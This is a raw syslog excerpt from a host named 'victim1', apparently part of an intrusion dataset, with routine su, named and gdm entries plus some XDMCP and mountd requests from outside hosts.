Jan 14 13:01:00 victim1 PAM_pwdb[23022]: (su) session opened for user news by (uid=0)
Jan 14 13:01:01 victim1 PAM_pwdb[23022]: (su) session closed for user news
Jan 14 13:21:58 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 13:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 13:21:59 victim1 named[385]: USAGE 947827319 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 13:21:59 victim1 named[385]: NSTATS 947827319 944119308
Jan 14 13:21:59 victim1 named[385]: XSTATS 947827319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 13:50:44 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 13:56:04 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 13:56:04 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 14:01:00 victim1 PAM_pwdb[23081]: (su) session opened for user news by (uid=0)
Jan 14 14:01:01 victim1 PAM_pwdb[23081]: (su) session closed for user news
Jan 14 14:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 14:21:59 victim1 named[385]: USAGE 947830919 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 14:21:59 victim1 named[385]: NSTATS 947830919 944119308
Jan 14 14:21:59 victim1 named[385]: XSTATS 947830919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 14:30:28 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 14:56:04 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 15:01:01 victim1 PAM_pwdb[23141]: (su) session opened for user news by (uid=0)
Jan 14 15:01:01 victim1 PAM_pwdb[23141]: (su) session closed for user news
Jan 14 15:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 15:21:59 victim1 named[385]: USAGE 947834519 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 15:21:59 victim1 named[385]: NSTATS 947834519 944119308
Jan 14 15:21:59 victim1 named[385]: XSTATS 947834519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 15:49:35 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 15:50:23 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 15:56:04 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 16:01:00 victim1 PAM_pwdb[23201]: (su) session opened for user news by (uid=0)
Jan 14 16:01:01 victim1 PAM_pwdb[23201]: (su) session closed for user news
Jan 14 16:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 16:21:59 victim1 named[385]: USAGE 947838119 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 16:21:59 victim1 named[385]: NSTATS 947838119 944119308
Jan 14 16:21:59 victim1 named[385]: XSTATS 947838119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 16:24:43 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 16:34:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 16:34:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 17:01:01 victim1 PAM_pwdb[23260]: (su) session opened for user news by (uid=0)
Jan 14 17:01:02 victim1 PAM_pwdb[23260]: (su) session closed for user news
Jan 14 17:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 17:21:59 victim1 named[385]: USAGE 947841719 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 17:21:59 victim1 named[385]: NSTATS 947841719 944119308
Jan 14 17:21:59 victim1 named[385]: XSTATS 947841719 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 17:24:42 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 17:34:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 18:01:00 victim1 PAM_pwdb[23319]: (su) session opened for user news by (uid=0)
Jan 14 18:01:01 victim1 PAM_pwdb[23319]: (su) session closed for user news
Jan 14 18:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 18:21:59 victim1 named[385]: USAGE 947845319 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 18:21:59 victim1 named[385]: NSTATS 947845319 944119308
Jan 14 18:21:59 victim1 named[385]: XSTATS 947845319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 18:24:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 19:01:00 victim1 PAM_pwdb[23380]: (su) session opened for user news by (uid=0)
Jan 14 19:01:04 victim1 PAM_pwdb[23380]: (su) session closed for user news
Jan 14 19:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 19:21:59 victim1 named[385]: USAGE 947848919 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 19:21:59 victim1 named[385]: NSTATS 947848919 944119308
Jan 14 19:21:59 victim1 named[385]: XSTATS 947848919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 19:24:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 19:36:25 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 20:01:01 victim1 PAM_pwdb[23439]: (su) session opened for user news by (uid=0)
Jan 14 20:01:02 victim1 PAM_pwdb[23439]: (su) session closed for user news
Jan 14 20:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 20:21:59 victim1 named[385]: USAGE 947852519 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 20:21:59 victim1 named[385]: NSTATS 947852519 944119308
Jan 14 20:21:59 victim1 named[385]: XSTATS 947852519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 21:01:00 victim1 PAM_pwdb[23500]: (su) session opened for user news by (uid=0)
Jan 14 21:01:01 victim1 PAM_pwdb[23500]: (su) session closed for user news
Jan 14 21:21:54 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 14 21:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 21:21:59 victim1 named[385]: USAGE 947856119 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 21:21:59 victim1 named[385]: NSTATS 947856119 944119308
Jan 14 21:21:59 victim1 named[385]: XSTATS 947856119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 22:01:00 victim1 PAM_pwdb[23561]: (su) session opened for user news by (uid=0)
Jan 14 22:01:02 victim1 PAM_pwdb[23561]: (su) session closed for user news
Jan 14 22:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 22:21:59 victim1 named[385]: USAGE 947859719 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 22:21:59 victim1 named[385]: NSTATS 947859719 944119308
Jan 14 22:21:59 victim1 named[385]: XSTATS 947859719 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 23:01:00 victim1 PAM_pwdb[23620]: (su) session opened for user news by (uid=0)
Jan 14 23:01:01 victim1 PAM_pwdb[23620]: (su) session closed for user news
Jan 14 23:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 23:21:59 victim1 named[385]: USAGE 947863319 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 23:21:59 victim1 named[385]: NSTATS 947863319 944119308
Jan 14 23:21:59 victim1 named[385]: XSTATS 947863319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 00:01:01 victim1 PAM_pwdb[23679]: (su) session opened for user news by (uid=0)
Jan 15 00:01:01 victim1 PAM_pwdb[23679]: (su) session closed for user news
Jan 15 00:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 00:22:00 victim1 named[385]: USAGE 947866919 944119308 CPU=1.01u/3.27s CHILDCPU=0u/0s
Jan 15 00:22:00 victim1 named[385]: NSTATS 947866919 944119308
Jan 15 00:22:00 victim1 named[385]: XSTATS 947866919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 01:01:01 victim1 PAM_pwdb[23738]: (su) session opened for user news by (uid=0)
Jan 15 01:01:02 victim1 PAM_pwdb[23738]: (su) session closed for user news
Jan 15 01:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 01:21:59 victim1 named[385]: USAGE 947870519 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 01:21:59 victim1 named[385]: NSTATS 947870519 944119308
Jan 15 01:21:59 victim1 named[385]: XSTATS 947870519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 02:01:00 victim1 PAM_pwdb[23797]: (su) session opened for user news by (uid=0)
Jan 15 02:01:01 victim1 PAM_pwdb[23797]: (su) session closed for user news
Jan 15 02:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 02:21:59 victim1 named[385]: USAGE 947874119 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 02:21:59 victim1 named[385]: NSTATS 947874119 944119308
Jan 15 02:21:59 victim1 named[385]: XSTATS 947874119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 03:01:00 victim1 PAM_pwdb[23856]: (su) session opened for user news by (uid=0)
Jan 15 03:01:01 victim1 PAM_pwdb[23856]: (su) session closed for user news
Jan 15 03:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 03:21:59 victim1 named[385]: USAGE 947877719 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 03:21:59 victim1 named[385]: NSTATS 947877719 944119308
Jan 15 03:21:59 victim1 named[385]: XSTATS 947877719 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 04:01:00 victim1 PAM_pwdb[23915]: (su) session opened for user news by (uid=0)
Jan 15 04:01:01 victim1 PAM_pwdb[23915]: (su) session closed for user news
Jan 15 04:02:00 victim1 PAM_pwdb[23955]: (su) session opened for user news by (uid=0)
Jan 15 04:02:47 victim1 PAM_pwdb[23955]: (su) session closed for user news
Jan 15 04:06:15 victim1 PAM_pwdb[24428]: (su) session opened for user news by (uid=0)
Jan 15 04:06:16 victim1 PAM_pwdb[24428]: (su) session closed for user news
Jan 15 04:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 04:21:59 victim1 named[385]: USAGE 947881319 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 04:21:59 victim1 named[385]: NSTATS 947881319 944119308
Jan 15 04:21:59 victim1 named[385]: XSTATS 947881319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 05:01:00 victim1 PAM_pwdb[24532]: (su) session opened for user news by (uid=0)
Jan 15 05:01:02 victim1 PAM_pwdb[24532]: (su) session closed for user news
Jan 15 05:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 05:21:59 victim1 named[385]: USAGE 947884919 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 05:21:59 victim1 named[385]: NSTATS 947884919 944119308
Jan 15 05:21:59 victim1 named[385]: XSTATS 947884919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 06:01:00 victim1 PAM_pwdb[24591]: (su) session opened for user news by (uid=0)
Jan 15 06:01:01 victim1 PAM_pwdb[24591]: (su) session closed for user news
Jan 15 06:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 06:21:59 victim1 named[385]: USAGE 947888519 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 06:21:59 victim1 named[385]: NSTATS 947888519 944119308
Jan 15 06:21:59 victim1 named[385]: XSTATS 947888519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 07:01:00 victim1 PAM_pwdb[24650]: (su) session opened for user news by (uid=0)
Jan 15 07:01:01 victim1 PAM_pwdb[24650]: (su) session closed for user news
Jan 15 07:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 07:21:59 victim1 named[385]: USAGE 947892119 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 07:21:59 victim1 named[385]: NSTATS 947892119 944119308
Jan 15 07:21:59 victim1 named[385]: XSTATS 947892119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 08:01:01 victim1 PAM_pwdb[24709]: (su) session opened for user news by (uid=0)
Jan 15 08:01:02 victim1 PAM_pwdb[24709]: (su) session closed for user news
Jan 15 08:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 08:21:59 victim1 named[385]: USAGE 947895719 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 08:21:59 victim1 named[385]: NSTATS 947895719 944119308
Jan 15 08:21:59 victim1 named[385]: XSTATS 947895719 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 09:01:00 victim1 PAM_pwdb[24768]: (su) session opened for user news by (uid=0)
Jan 15 09:01:01 victim1 PAM_pwdb[24768]: (su) session closed for user news
Jan 15 09:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 09:21:59 victim1 named[385]: USAGE 947899319 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 09:21:59 victim1 named[385]: NSTATS 947899319 944119308
Jan 15 09:21:59 victim1 named[385]: XSTATS 947899319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 10:01:00 victim1 PAM_pwdb[24827]: (su) session opened for user news by (uid=0)
Jan 15 10:01:01 victim1 PAM_pwdb[24827]: (su) session closed for user news
Jan 15 10:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 10:21:59 victim1 named[385]: USAGE 947902919 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 10:21:59 victim1 named[385]: NSTATS 947902919 944119308
Jan 15 10:21:59 victim1 named[385]: XSTATS 947902919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 11:01:01 victim1 PAM_pwdb[24888]: (su) session opened for user news by (uid=0)
Jan 15 11:01:03 victim1 PAM_pwdb[24888]: (su) session closed for user news
Jan 15 11:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 11:21:59 victim1 named[385]: USAGE 947906519 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 11:21:59 victim1 named[385]: NSTATS 947906519 944119308
Jan 15 11:21:59 victim1 named[385]: XSTATS 947906519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 11:37:05 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.99
Jan 15 12:01:01 victim1 PAM_pwdb[24947]: (su) session opened for user news by (uid=0)
Jan 15 12:01:03 victim1 PAM_pwdb[24947]: (su) session closed for user news
Jan 15 12:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 12:21:59 victim1 named[385]: USAGE 947910119 944119308 CPU=1.01u/3.29s CHILDCPU=0u/0s
Jan 15 12:21:59 victim1 named[385]: NSTATS 947910119 944119308
Jan 15 12:21:59 victim1 named[385]: XSTATS 947910119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 13:01:01 victim1 PAM_pwdb[25006]: (su) session opened for user news by (uid=0)
Jan 15 13:01:02 victim1 PAM_pwdb[25006]: (su) session closed for user news
Jan 15 13:17:15 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 13:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 13:21:59 victim1 named[385]: USAGE 947913719 944119308 CPU=1.01u/3.31s CHILDCPU=0u/0s
Jan 15 13:21:59 victim1 named[385]: NSTATS 947913719 944119308
Jan 15 13:21:59 victim1 named[385]: XSTATS 947913719 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 14:01:00 victim1 PAM_pwdb[25065]: (su) session opened for user news by (uid=0)
Jan 15 14:01:02 victim1 PAM_pwdb[25065]: (su) session closed for user news
Jan 15 14:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 14:21:59 victim1 named[385]: USAGE 947917319 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 15 14:21:59 victim1 named[385]: NSTATS 947917319 944119308
Jan 15 14:21:59 victim1 named[385]: XSTATS 947917319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 14:47:01 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 15:01:00 victim1 PAM_pwdb[25126]: (su) session opened for user news by (uid=0)
Jan 15 15:01:01 victim1 PAM_pwdb[25126]: (su) session closed for user news
Jan 15 15:09:01 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 15:13:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 15:19:23 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 15:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 15:21:59 victim1 named[385]: USAGE 947920919 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 15 15:21:59 victim1 named[385]: NSTATS 947920919 944119308
Jan 15 15:21:59 victim1 named[385]: XSTATS 947920919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 15:30:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 15:38:39 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 15:40:46 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 15:43:58 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 15:46:18 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 16:00:14 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 16:01:00 victim1 PAM_pwdb[25185]: (su) session opened for user news by (uid=0)
Jan 15 16:01:01 victim1 PAM_pwdb[25185]: (su) session closed for user news
Jan 15 16:02:07 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 16:03:38 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 16:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 16:21:59 victim1 named[385]: USAGE 947924519 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 15 16:21:59 victim1 named[385]: NSTATS 947924519 944119308
Jan 15 16:21:59 victim1 named[385]: XSTATS 947924519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 16:36:06 victim1 mountd[438]: dump request from 137.189.97.166 
Jan 15 16:36:07 victim1 mountd[438]: export request from 137.189.97.166 
Jan 15 17:01:00 victim1 PAM_pwdb[25246]: (su) session opened for user news by (uid=0)
Jan 15 17:01:01 victim1 PAM_pwdb[25246]: (su) session closed for user news
Jan 15 17:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 17:21:59 victim1 named[385]: USAGE 947928119 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 15 17:21:59 victim1 named[385]: NSTATS 947928119 944119308
Jan 15 17:21:59 victim1 named[385]: XSTATS 947928119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 17:30:21 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 17:32:38 victim1 last message repeated 2 times
Jan 15 17:34:10 victim1 last message repeated 2 times
Jan 15 17:36:58 victim1 last message repeated 2 times
Jan 15 17:38:54 victim1 last message repeated 3 times
Jan 15 18:01:01 victim1 PAM_pwdb[25305]: (su) session opened for user news by (uid=0)
Jan 15 18:01:04 victim1 PAM_pwdb[25305]: (su) session closed for user news
Jan 15 18:15:17 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 15 18:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 18:21:59 victim1 named[385]: USAGE 947931719 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 15 18:21:59 victim1 named[385]: NSTATS 947931719 944119308
